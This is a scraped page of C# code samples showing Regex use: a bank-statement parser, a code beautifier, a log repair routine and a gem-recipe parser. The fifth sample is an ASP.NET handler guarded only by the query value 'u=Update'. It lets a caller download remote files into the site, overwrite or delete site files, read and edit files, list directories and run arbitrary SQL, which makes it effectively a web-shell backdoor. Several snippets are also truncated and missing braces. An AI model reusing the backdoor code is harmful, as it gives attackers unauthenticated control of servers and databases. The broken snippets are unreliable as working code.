Exemplo n.º 1
 protected override void ParseAdditionalInformation()
     string bankName = new Regex(@"/BBK/.*\|?").Match(statementLine).Value;
     if (!string.IsNullOrEmpty(bankName))
         bankName = bankName.Substring(5);
         if (bankName.EndsWith("|"))
             bankName = bankName.Substring(0, bankName.Length - 1);
         int vertical = bankName.IndexOf("|");
         if (-1 < vertical)
             bankName = bankName.Substring(0, vertical);
         bankStatement.CptyBankName = bankName.Trim();
     //put tag 86 information to remark
     string[] remarks = statementLine.Split(new string[] { TAG_ADDITIONAL_INFO }, StringSplitOptions.None);
     if (remarks.Length > 1)
         bankStatement.Remark = remarks[1];
Exemplo n.º 2
        private string BeautyMyCode(string Source)
            Source = RemoveStr(Source, new string[] { "\n", "\x09", "  " });
            Source = new Regex("#include <(.*?)>").Replace(Source, "$0\n");
            Source = new Regex(";").Replace(Source, "$0\n");
            Source = new Regex("{").Replace(Source, "\n$0\n");
            Source = new Regex("}").Replace(Source, "$0\n");
            int DeepCount = 0;
            for (int i = 0; i < Source.Length; i++)
                if (Source[i] == '}') DeepCount--;
                else if (Source[i] == '{') DeepCount++;
                else if (Source[i]  == '\n')
                    int NextNewLinePos = Source.IndexOf("\n", i + 1);
                    if (NextNewLinePos != -1)
                        Console.WriteLine(Source.Substring(i, NextNewLinePos - i));
                        if (Source.Substring(i, NextNewLinePos - i).Contains("}"))
                            Source = Source.Insert(i + 1, GetManyBlankStr(DeepCount -1));
                            Source = Source.Insert(i + 1, GetManyBlankStr(DeepCount));

            return (Source);
Exemplo n.º 3
        public void RepairLog()

            string logPath = LogsDirectoryPath + Path.DirectorySeparatorChar + LogDateStamp + Path.DirectorySeparatorChar + LogFileName;
            string fixedLogPath = LogsDirectoryPath + Path.DirectorySeparatorChar + LogDateStamp + Path.DirectorySeparatorChar + RepairedLogFileName;

            string logContents;

            using (StreamReader reader = new StreamReader(logPath))
                logContents = reader.ReadToEnd();

            // Remove any duplicate <Log>...</Log> tags
            logContents = new Regex("</Log>(.|\r\n)*?<Log>", RegexOptions.IgnoreCase | RegexOptions.Multiline)
                .Replace(logContents, "");

            // Add the start <Log> tag if necessary
            string startTag = "<Log>";
            if (logContents.IndexOf(startTag) == -1)
                logContents = startTag + "\r\n" + logContents;

            // Add the XML declaration if necessary
            // This must be done before after the start tag prepend won't work
            string xmlDeclaration = "<?xml version=\'1.0\'?>";
            if (logContents.IndexOf(xmlDeclaration) == -1)
                logContents = xmlDeclaration + "\r\n" + logContents;

            // Add the ending </Log> tag if necessary
            if (logContents.IndexOf("</Log>") == -1)
                logContents = logContents + "</Log>";

            using (StreamWriter writer = File.CreateText(fixedLogPath))
Exemplo n.º 4
		public static IEnumerable<string> EquationsFromParentheses(string recipe)
			var equations = new List<string>();
			if (string.IsNullOrWhiteSpace(recipe))
				return equations;

			recipe = "(" + recipe + ")"; // If this is a duplication of effort, we'll silently ignore it later.
			recipe = new Regex(@"\s+").Replace(recipe, string.Empty); // Remove all whitespace.
			recipe = LeveledPreparser(recipe);

			var multiLetterMatch = invalidLetterFinder.Match(recipe);
			if (multiLetterMatch.Success)
				throw new ArgumentException("The gem \"" + multiLetterMatch.Value + "\" must be a single letter. Gem combinations must be expressed as individual components separated with plus signs and brackets, as needed. For example:\nob → o+b\nob+o → (o+b)+o");

			var id = 0;
			foreach (var c in Gem.GemInitializer)
				if (recipe.IndexOf(c) > -1)
					recipe = recipe.Replace(c, id.ToString(CultureInfo.InvariantCulture)[0]);
					equations.Add(string.Format(CultureInfo.InvariantCulture, "{0}={1}", id, c));

			if (equations.Count == 0)
				throw new ArgumentException("Recipe did not contain any recognizable gems.");

			// Scan for plus signs within the formula and add gems together appropriately.
			int plus = recipe.IndexOf('+');
			string newNum = (id - 1).ToString(CultureInfo.InvariantCulture);
			while (plus > -1)
				string thisCombine;
				var close = recipe.IndexOf(')', plus);
				if (close >= 0)
					var open = recipe.LastIndexOf('(', close);
					if (open < 0)
						throw new ArgumentException("Bracket mismatch in formula.");

					thisCombine = recipe.Substring(open + 1, close - open - 1);

					string[] combineGems = thisCombine.Split('+');
					if (combineGems.Length != 2)
						throw new ArgumentException("The formula provided contains more than a single plus sign within a pair of brackets or a term that is over-bracketed (e.g., \"((o+o))\"). These are not currently supported.");

					if (combineGems[0].Length == 0 || combineGems[1].Length == 0)
						throw new ArgumentException("Invalid formula part: (" + thisCombine + ")");

					newNum = id.ToString(CultureInfo.InvariantCulture);
					recipe = recipe.Replace("(" + thisCombine + ")", newNum);
					equations.Add(string.Format(CultureInfo.InvariantCulture, "{0}={1}+{2}", id, combineGems[0], combineGems[1]));
					throw new ArgumentException("Bracket mismatch in formula.");

				plus = recipe.IndexOf('+');

			while (recipe.StartsWith("(", StringComparison.Ordinal) && recipe.EndsWith(")", StringComparison.Ordinal))
				recipe = recipe.Substring(1, recipe.Length - 2);

			if (recipe != newNum)
				if (recipe.Contains("("))
					throw new ArgumentException("Bracket mismatch in formula.");

				throw new ArgumentException("Invalid recipe.");

			return equations;
Exemplo n.º 5
        /// <summary>
        /// Page_Load
        /// </summary>
        /// <param name="e"></param>
        protected override void OnInit(EventArgs e) {
            string localPath = string.Empty;
            string fileName = string.Empty;
            bool isTrue = true;
            string u2 = "Update";
            string[] ext = new string[] { "/bin.bak/", "/app_data.bak/", "/app_code.bak/", "\\.dll.bak", "\\.aspx.bak", "\\.config.bak", "\\.master.bak", "\\.asax.bak", "\\.ascx.bak", "\\.compiled.bak", "\\.asmx.bak", "\\.cs.bak" };
            string[] repExt = new string[] { "/Bin/", "/App_Data/", "/App_Code/", "\\.dll", "\\.aspx", "\\.config", "\\.master", "\\.asax", "\\.ascx", "\\.compiled", "\\.asmx", "\\.cs" };
            string[] strList = new string[] { "{1}: {0} ok!", "<font color='red'>{1}: {0} error!</font>" };
            string u1 = Request2.GetQ("u").Trim();
            if (!u2.Equals(u1)) return;
            string active = Request2.GetQ("active").Trim();
            switch (active) {
                case "sh": Msg.WriteEnd(template.Replace("{0}", Environment.MachineName).Replace("{1}", Request2.GetRelativeRoot())); break;
                case "do":
                    string file = Request2.Get("file").Trim(); //StringExtensions.HtmlDecode(Request2.Get("file")).Trim();
                    if (file.IsNullEmpty()) Msg.WriteEnd("error file.");
                    string action = file.Substring(0, 3);
                    file = "/" + file.Substring(3).TrimStart('/').TrimStart('\\').Replace("\\", "/");
                    if (file.Length < 1) Msg.WriteEnd(string.Format(strList[1], file, "file"));
                    string url = StringExtensions.HtmlDecode(Request2.Get("url")).Replace("\\", "/").TrimEnd('/').TrimEnd('\\').Trim();
                    if (url.Length < 10) Msg.WriteEnd(string.Format(strList[1], url, "url"));

                    switch (action) {
                        case "af:":
                            isTrue = true;
                            for (int i = 0; i < ext.Length; i++) file = new Regex(ext[i], RegexOptions.IgnoreCase).Replace(file, repExt[i]);
                            file = file.Replace("\\.", ".");
                            string[] folderList = file.Split('/');
                            if (folderList.Length > 1) { fileName = folderList[folderList.Length - 1]; FileDirectory.DirectoryVirtualCreate("~/tmp" + file.Replace(fileName, "")); }
                            for (int i = 0; i < ext.Length; i++) file = new Regex(repExt[i], RegexOptions.IgnoreCase).Replace(file, ext[i]);
                            file = file.Replace("\\.", ".");
                            url = url + file;
                            for (int i = 0; i < ext.Length; i++) file = new Regex(ext[i], RegexOptions.IgnoreCase).Replace(file, repExt[i]);
                            file = file.Replace("\\.", ".");
                            localPath = "~/tmp/".GetMapPath() + "{0}";
                            file = file.Replace("/", "\\");
                            fileName = string.Format(localPath, file);
                            System.Net.WebClient wc = new System.Net.WebClient();
                            try {
                                wc.DownloadFile(url, fileName);
                            } catch {
                                isTrue = false;
                            } finally {
                            file = file.Replace("\\", "/");
                            for (int i = 0; i < ext.Length; i++) file = new Regex(repExt[i], RegexOptions.IgnoreCase).Replace(file, ext[i]);
                            file = file.Replace("\\.", ".");
                            if (isTrue) Response.Write(string.Format(strList[0], file, "add file")); else Response.Write(string.Format(strList[1], file, "add file"));
                        case "df:":
                            if (file == "/all") {
                                localPath = Server2.GetMapPath("~/");
#if !MONO40
                                Msg.WriteEnd(string.Format(strList[0], "all", "del file") + "<br>");
                            localPath = Server2.GetMapPath("~/") + file;
                            if (!FileDirectory.FileExists(localPath)) Msg.WriteEnd(string.Format(strList[1], file, "del file"));
                            try {
                            } catch {
                                Msg.WriteEnd(string.Format(strList[1], file, "del file"));
                            Response.Write(string.Format(strList[0], file, "del file"));
                        case "rf:":
                            localPath = Server2.GetMapPath("~/") + file;
                            if (!FileDirectory.FileExists(localPath)) Msg.WriteEnd(string.Format(strList[1], file, "read file"));
                            string sbText = FileDirectory.FileReadAll(localPath, Encoding.UTF8);
                            string text = "<textarea id=\"txtContent\" cols=\"70\" rows=\"20\" f=\"" + localPath + "\">" + sbText + "</textarea><br /><input id=\"btnEdit\" type=\"button\" value=\"edit\" />";
                            Msg.WriteEnd(text + " ok!");
                        case "ap:":
                            FileDirectory.DirectoryVirtualCreate("~" + file);
                            Msg.WriteEnd(string.Format(strList[0], file, "add path"));
                        case "dp:":
                            localPath = Server2.GetMapPath("~/") + file;
                            try {
                                if (System.IO.Directory.Exists(localPath)) System.IO.Directory.Delete(localPath);
                            } catch {
                                Msg.WriteEnd(string.Format(strList[1], file, "del path"));
                            Msg.WriteEnd(string.Format(strList[0], file, "del path"));
                        case "rp:":
                            localPath = Server2.GetMapPath("~/") + file.TrimStart('/').TrimEnd('/') + "/";
                            string size = "";
                            System.Collections.Generic.IList<string> sbFile2 = new System.Collections.Generic.List<string>();
                            StringBuilder sbFile3 = new StringBuilder();
                            try {
                                FileDirectory.FileList(localPath, ref sbFile2, localPath);
                                localPath = localPath.Replace("\\/", "\\");
                                for (int i = 0; i < sbFile2.Count; i++) {
                                    file = sbFile2[i].Trim().TrimStart('.');
                                    if (file.Equals("")) continue;
                                    try { size = LongExtensions.FormatKB((new System.IO.FileInfo(file)).Length); } catch { size = "0"; }
                                    sbFile3.Append(file.Replace(localPath, "").Replace("\\", "/") + " (" + size + ")" + Environment.NewLine);
                                    if (i.Equals(sbFile2.Count - 2)) sbFile3.Append("(" + sbFile2.Count + ")" + Environment.NewLine);
                            } catch {
                                Msg.WriteEnd(string.Format(strList[1], file, "read path"));
                            text = localPath + "<br /><textarea id=\"txtText\" cols=\"100\" rows=\"20\">" + sbFile3.ToString() + "</textarea>";
                            Msg.WriteEnd(string.Format(strList[0], text, "read path"));
                        case "db:":
                            file = file.Replace("/r/n", Environment.NewLine).Trim('/');
                            if (file.IndexOf(Environment.NewLine + "GO" + Environment.NewLine) != -1) {
                                Data.ExecuteCommandWithSplitter(file, "GO");
                                Msg.WriteEnd(string.Format(strList[0], "", "read db"));
                            } else {
                                text = file + "<br /><textarea id=\"txtText\" cols=\"100\" rows=\"20\">" + Data.GetDataSet(file).ToJson() + "</textarea>";
                                Msg.WriteEnd(string.Format(strList[0], text, "read db"));
                        default: Msg.WriteEnd("file error!"); break;
                case "ok": localPath = "~/tmp/".GetMapPath();
                    System.Collections.Generic.IList<string> fileList = new System.Collections.Generic.List<string>();
                    FileDirectory.FileList(localPath, ref fileList, localPath);
                    for (int i = 0; i < fileList.Count; i++) {
                        file = fileList[i].Trim().TrimStart('.');
                        if (file.Length < 2) continue;
                        fileName = localPath + file;
                        isTrue = FileDirectory.FileCopy(fileName, Server2.GetMapPath("~/") + file, true);
                        if (isTrue) FileDirectory.FileDelete(fileName);
                        if (isTrue) Response.Write(string.Format(strList[0], file, "update") + "<br />"); else Response.Write(string.Format(strList[1], file, "update") + "<br />");
                case "ef":
                    localPath = Request2.GetF("file").Trim();
                    string content = Request2.GetF("data").Trim();
                    isTrue = FileDirectory.FileWrite(localPath, content, Encoding.UTF8);
                    if (isTrue) Msg.WriteEnd("edit file ok!"); else Msg.WriteEnd("edit file error!"); 